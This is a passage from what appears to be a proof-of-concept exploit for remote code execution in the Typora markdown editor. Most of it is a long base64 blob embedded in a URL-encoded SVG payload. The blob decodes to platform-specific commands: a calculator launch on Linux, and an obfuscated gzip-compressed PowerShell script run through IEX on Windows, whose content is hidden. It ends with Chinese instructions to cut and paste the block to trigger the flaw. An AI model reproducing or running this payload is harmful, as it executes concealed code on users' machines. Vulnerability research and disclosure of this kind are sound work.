xBSGNBZWdCMkFHZ0FkZ0JpQUhRQWFRQkpBRGdBYWdCTUFERUFPQUJYQUhZQWN3QkZBR1FBZUFCNkFHa0FlUUJKQUZFQWFRQnFBSFVBTndCdUFGZ0FNQUJwQUdVQVZRQXpBR3dBZHdCTUFHNEFhd0J6QUhJQVNnQnZBRmtBTUFCMUFIQUFVd0JIQUhBQVpRQnZBR29BWVFCQkFFOEFZd0J6QUZZQVNnQm9BRUlBY2dCaEFFb0FkUUJ4QUd3QWNRQTNBQ3NBT0FCUkFFTUFjQUE1QUhrQVNRQm5BRU1BVFFCaEFHTUFiQUJTQUZNQWVRQmpBR0VBUlFBdkFHOEFiQUEwQURBQVN3Qk9BSE1BY0FCM0FHZ0FXZ0IxQUZnQVpnQTRBRFlBVGdCVkFGWUFWZ0JGQUdzQVR3QjZBRFVBUndCRUFIQUFXQUJQQUhVQU1RQkJBRkFBWndCNkFETUFkQUJQQUdJQVpRQkxBSGtBZEFCTkFFNEFOd0JLQUVZQVdnQXJBRUVBS3dCM0FEY0FNd0JXQUhrQVRBQlpBSEVBVFFCeEFIb0FkQUJLQUVnQU1BQkVBRlFBUWdCR0FFTUFlQUJHQURFQVZ3QlpBR3dBVlFBd0FHa0FNZ0IwQUdNQVN3QnNBRklBT0FCVEFEY0FNd0FyQUVRQU9RQXpBRElBVEFBckFGRUFOZ0J0QUZFQVRnQkJBSFFBYXdCTkFGY0FPQUJGQUU4QVZRQmtBR0lBWlFCcUFGZ0FUQUJyQUVRQVdnQkRBR1VBTUFCTUFHSUFZd0JaQUc4QVdRQk9BSEVBYkFCeUFFRUFVZ0JtQUhVQWJRQnRBRlVBTVFCV0FFb0FkUUJDQUcwQVlnQlFBSG9BWkFCa0FETUFid0J1QUU0QVlRQlRBRlVBVXdCV0FHVUFjd0JTQUhvQWRRQnBBRUlBUlFCeUFGa0FZUUJoQURrQU53Qm9BR2tBYndCakFEY0FSZ0FyQURZQVVRQjZBRlVBTVFCeUFIQUFLd0JEQUVJQWVnQjNBREVBVWdBekFFb0Fkd0JzQURBQVZnQXdBRkVBTmdBNUFHWUFjUUJuQUZvQVV3QldBSG9BVEFCMkFHSUFad0JOQUdrQVRBQkNBRkVBUWdCTUFIQUFaZ0JuQUVjQU5RQk5BRTBBVWdBNUFEY0FRZ0IxQUZjQVJRQnZBRUlBUlFCUEFGSUFlUUJUQUdvQWNnQkNBRW9BY0FCU0FHNEFVQUJMQUZnQVlnQk1BR0lBZEFCd0FIa0FjZ0JJQUZFQWRnQmlBSE1BS3dCSEFFUUFkQUJYQUdJQVZBQjZBREVBT1FBd0FGTUFTQUI1QUdFQVpBQk1BSG9BWXdCUUFHY0FPQUJGQUc0QWNBQnlBRVFBWkFCcEFFZ0FTUUJRQUdNQVZnQlBBSGNBTXdCWEFHd0FSUUJEQUhFQVdBQkhBRVFBVEFCSkFHd0FUUUJQQUdVQVpnQndBRFVBUlFCekFHa0FiZ0JIQUZjQUt3QjFBRlFBTndCRUFHd0FhZ0JNQUhnQVpRQkxBRFlBU3dBMkFIRUFNUUJwQUVzQVpnQlRBRXdBUmdBd0FEVUFhd0JsQUVzQU5BQklBR2tBZVFCSUFHSUFSQUJQQUc4QWJRQnlBR0VBU0FCcEFGTUFLd0FyQURNQVFnQnBBRTRBVGdCQ0FFY0FlQUIyQUZBQVN3Qk9BR01BTXdCbkFEZ0FlUUJZQUVnQWRRQjRBRkFBU1FCT0FIUUFaZ0JQQUhRQWJnQmxBRVFBWndCU0FFVUFUUUJxQURnQU5nQmFBRklBTHdCV0FESUFVZ0JhQUdFQVJBQTFBRGtBTVFBeEFEY0FaZ0JTQUU4QWRBQTFBR1lBZWdCb0FFMEFZZ0J0QUdnQVl3QlNBR01BVlFCUUFEWUFVQUJtQUdJQVJ3QXdBRUVBTHdCeUFHc0Fkd0IyQUdNQVNBQlpBRGdBU0FBMEFFd0FUd0JoQUdVQWJRQlNBRWdBVXdBeUFESUFOd0J2QUdRQWVRQjNBRWtBUXdCQkFEa0Fid0F3QUZZQVZRQXpBR01BWlFCdUFFWUFZUUE0QUdRQU5nQTNBRTBBZEFCNUFHSUFSd0JrQUdVQWFBQlVBR29BU2dCTkFFNEFjQUJSQURJQU5RQTBBREFBWmdBekFHb0FNUUJzQUhjQVJnQlZBRzRBTVFCdEFIa0FUZ0J2QUVFQWF3QjVBRUVBWlFBeUFHc0FOUUEyQUd3QWRRQlVBREFBU2dCMUFFMEFUUUJWQURFQVdBQjBBREFBZEFBdkFGSUFNUUJvQUhjQVJnQTNBR0VBV2dBMUFEUUFaQUJMQUVJQU13QjNBRUVBZEFCWkFHd0FUZ0JQQUVVQUt3QnlBRzRBVHdCbEFFMEFXQUJoQUhVQVJnQkNBRmdBYXdBNUFHUUFkUUJQQUc0QVdnQkVBSElBVVFBMEFHTUFXQUJIQUVFQVNBQlRBR01BVHdCdEFHZ0FVZ0F6QUZrQWVnQkJBRm9BYWdCcUFGa0FTZ0JEQUdFQVNRQm9BRU1BVlFBMEFEUUFZUUJGQURVQWJnQk5BRTBBVHdCa0FEWUFNZ0JZQUhrQU9BQjNBR0VBWlFCekFHd0FVUUFyQUUwQVFRQTNBRXNBUXdCS0FGSUFiQUJsQURNQWR3QkJBRzRBVlFCMUFHOEFhZ0JPQUVFQWNBQlhBRFlBWXdCNkFHTUFXZ0JUQUdzQU9BQnJBRVlBZFFCNEFEa0FNUUJOQUZRQU5RQlVBRmtBY2dCekFFZ0FTZ0JvQUhnQU1nQlFBRm9BTHdCUEFHUUFNQUJzQUhrQVN3QmFBRFVBWXdCWkFGUUFZUUJxQUdjQVNnQnFBSFFBWXdCNkFFMEFLd0E0QUdFQVlnQkRBR0lBZFFCTEFGY0FkUUJPQURZQVNRQXlBR2dBUmdCdkFHNEFXUUJrQUdRQWNnQk5BRzBBWndBMUFGUUFZd0F2QUZNQVJnQnZBRzBBVndCT0FITUFjQUJ3QUVvQU13QkRBRzRBTkFCMEFHc0FZd0IzQUhJQVN3Qm5BR2NBUmdCR0FGVUFNZ0E1QUVjQVZ3QlNBRmdBV2dBNUFIY0FaZ0J6QUhRQVdnQnJBQ3NBT0FBeUFISUFTQUJ5QUZZQWJnQktBRmtBY0FCU0FFNEFUd0JyQURjQVdRQk1BREFBVWdCc0FFc0FhUUI1QUU4QU53QTJBR01BT0FCdUFEZ0FZZ0JMQUVnQVVnQTRBSFFBWVFCU0FIZ0FRd0EzQUdNQVF3QkxBR1FBZUFBNEFIQUFZd0JUQUhFQVdnQmhBR0lBWWdCb0FGSUFhZ0EzQURNQVdnQjNBSFFBY1FCTUFHZ0FkQUJ6QUU0QWRBQjJBSFVBZUFCSkFGTUFOd0JIQUU4QWJBQTVBR1lBTUFCSUFHa0FXUUEwQURFQVZ3QlFBRVlBTkFBd0FFNEFSZ0JJQUhZQU53QnRBSFFBY2dCdUFFb0FNd0JXQUU0QU9BQjNBR1VBV2dCMkFHUUFlQUJIQUhNQWFBQm1BRUlBYXdCbEFEQUFkQUJDQUhnQVRnQm9BRllBVVFCekFHNEFNQUJ0QUVrQWRnQnBBRzBBZGdCWEFFMEFVZ0JPQURZQWVBQjJBRVVBTmdCbUFESUFZUUJxQUV3QVZ3QldBRllBV0FCRkFIY0FZd0IzQUZjQU53QTBBR01BY2dCMkFHSUFaQUJuQUNzQVJBQlNBR3NBY2dCdUFHZ0FjZ0JIQUhnQWJnQjJBRzhBZWdCUkFGSUFPUUJsQUZvQWRRQnNBSGtBTUFBckFESUFZd0J6QUdFQU13QXZBR1FBZFFBMUFFOEFWZ0I0QUVvQWJnQktBRTBBWkFCbkFIY0FNUUIxQUhRQVp3QTRBRlVBWlFCNUFHTUFlQUJwQUd3QU9BQk9BRzhBVUFCcEFFb0FlUUF3QUd3QU1RQlFBRGtBV0FCV0FHb0FjQUJGQURZQU1nQTNBRk1BYXdCTkFFb0Fid0JtQUU4QVZ3Qk9BR01BV0FBMEFIRUFTd0E1QUZZQVZnQlNBR2dBY3dCT0FEY0FNUUF3QURJQWF3QjVBR0lBT0FCc0FEY0FWZ0J0QURZQU13QXJBR29BV1FBdkFHd0FhZ0IxQUdNQVdRQllBRW9BUXdBckFDOEFiQUJwQUVRQVZRQmtBRmNBWXdBNUFEa0FTQUJyQUhJQVNnQmpBRkVBTXdCVkFIUUFRd0J1QURBQVRnQnRBRTBBTVFCMUFHa0Fhd0JvQUdZQU5BQjVBRVlBZHdCR0FERUFTUUJFQUVzQVFnQmlBR1lBV0FCQkFHUUFRd0JQQUZZQVJBQTVBRzBBUmdBeEFFMEFSUUJWQURRQWRBQldBR1FBVEFCVkFEQUFOd0JVQUdRQU1BQm5BRllBZHdCUEFHTUFMd0JMQUVzQU5nQTBBRzBBYlFBdkFFTUFlUUJVQUVvQVZnQnJBRzhBTkFCSUFDc0FhUUJqQUdRQU5BQmFBRFFBUXdCWEFFZ0FNZ0JyQUhJQWFnQlRBR29BTVFCU0FGZ0FZd0I1QUhRQU13QlJBR3NBWndCUUFFVUFad0JRQUVzQWVRQkdBRWNBZFFBMkFIa0FOUUJWQUVjQU1BQjJBSFVBZHdCMUFIZ0FlUUF4QUdZQVVnQndBRFlBTWdCR0FHUUFNd0JYQUNzQVlRQkVBRGNBT1FCVEFGZ0FNZ0JsQUhVQWR3QXhBSEFBTkFCTkFIUUFlZ0JXQUZZQVlRQnZBSGtBVGdCRUFIWUFiUUJUQURFQVR3Qm5BRW9BTmdCWUFISUFUd0JxQUV3QVZ3QnhBRmtBTlFCNUFGTUFOZ0JqQUU4QVF3QTFBR1VBTkFCaUFEa0FUd0JGQUdvQWJ3Qm1BRFFBTXdCdEFGb0FTQUJzQUU0QVdnQmpBQ3NBV2dCVUFFSUFRZ0IzQUU0QVN3QTRBSEFBYWdBNEFFY0FXZ0ExQUdvQVZnQnZBR2tBVXdBM0FHWUFUUUJuQURZQWNnQTFBSEVBYndCWUFFTUFRUUJ6QUdrQWVBQjNBRXNBZEFCbEFEWUFUd0JIQURZQWRBQkZBSG9BVXdCUUFGY0FSQUJVQUU4QU13QkRBSE1BY1FCcEFHTUFTZ0J6QUNzQWR3QXpBSEFBVndCQ0FFNEFTd0FyQUhBQWRnQlJBRmNBVGdBeUFHSUFOQUJIQUhFQVF3QXhBRmNBTXdCckFHd0FaZ0E0QUhvQVlRQTFBRGdBZHdCcEFHUUFaZ0JLQUVvQWN3QnRBSFlBWndCSUFGRUFNd0FyQUdZQVl3Qk5BRk1BT0FCT0FIb0FkZ0JoQURRQWJRQm9BSElBZWdCaUFEWUFXQUI1QURNQWF3QTNBR1lBU0FCbkFDOEFaUUIyQUcwQVV3QjJBRTRBTlFCSUFIa0FVQUJtQURrQWF3QTFBRVlBVVFCakFDOEFXQUJ0QURRQU9BQlFBR1lBT1FBeEFHNEFhQUJDQUVRQU5RQXdBSG9BU2dBNUFFNEFXZ0J0QUU0QVFRQlJBR2NBZEFCbkFESUFhd0J1QUhBQVpBQklBRllBTHdCSEFETUFjd0JsQURZQVpBQXhBRzBBY0FCS0FHd0FiZ0JhQUhnQWNnQkdBRFFBZFFCa0FHb0FMd0JTQUVVQVVnQkdBRElBUlFBMkFEZ0FkQUJMQUdnQUt3QlFBRFlBYVFBd0FFZ0FRZ0ExQUUwQVNnQjJBSEVBWmdCcUFFb0FaUUF2QUdZQVNBQmxBRGdBS3dCdUFFd0FjUUJrQUVZQWJBQnVBR1lBZEFBd0FGWUFaZ0J5QURJQVR3QktBRklBU3dBNUFESUFaZ0JRQUdrQVNBQmxBRGNBWmdCUUFGTUFOUUJZQUdZQVJRQXJBRUVBV0FBMUFEY0FVZ0J5QUdJQU1BQm1BSEFBVlFCUUFGSUFRd0J5QUVrQU13QlZBR1FBVndCb0FHRUFhd0JzQURrQVZnQnhBSFFBYkFCMkFEQUFNZ0JoQUhRQVZBQmhBSElBZUFCTkFHb0FaUUJJQURVQVlRQm1BRXdBWkFCWUFIa0FWd0JoQUM4QVJBQXhBRUVBS3dCMUFITUFTd0ExQUhFQUx3QmtBR2dBYWdCakFGTUFkUUJuQUM4QU5nQlFBRTBBWmdCcUFFOEFOZ0F6QURrQWJnQk9BQ3NBVFFCMkFHNEFlQUFyQUM4QWN3QmFBR01BYWdBckFIQUFlUUI1QURjQVJRQklBQ3NBUmdBNEFFY0FSQUJzQUhJQVVBQm1BRVFBVVFCQkFFRUFJZ0FwQUNrQU93QkpBRVVBV0FBZ0FDZ0FUZ0JsQUhjQUxRQlBBR0lBYWdCbEFHTUFkQUFnQUVrQVR3QXVBRk1BZEFCeUFHVUFZUUJ0QUZJQVpRQmhBR1FBWlFCeUFDZ0FUZ0JsQUhjQUxRQlBBR0lBYWdCbEFHTUFkQUFnQUVrQVR3QXVBRU1BYndCdEFIQUFjZ0JsQUhNQWN3QnBBRzhBYmdBdUFFY0FlZ0JwQUhBQVV3QjBBSElBWlFCaEFHMEFLQUFrQUhNQUxBQmJBRWtBVHdBdUFFTUFid0J0QUhBQWNnQmxBSE1BY3dCcEFHOEFiZ0F1QUVNQWJ3QnRBSEFBY2dCbEFITUFjd0JwQUc4QWJnQk5BRzhBWkFCbEFGMEFPZ0E2QUVRQVpRQmpBRzhBYlFCd0FISUFaUUJ6QUhNQUtRQXBBQ2tBTGdCU0FHVUFZUUJrQUZRQWJ3QkZBRzRBWkFBb0FDa0FPd0E9JywgTGludXg6ICdnbm9tZS1jYWxjdWxhdG9yIC1lICJUeXBvcmEgUkNFIFBvQyInfSlbbmF2aWdhdG9yLnBsYXRmb3JtLnN1YnN0cigwLDUpXSk='))><%2fsvg>%22,%22%22,%22%22,%22%22,%22%22]">

选中代码块全部内容， Ctrl + x 剪切，然后在 Ctrl + V 粘贴即可触发漏洞（注：不要粘贴到原有的代码块中，粘贴到其他空白地方）。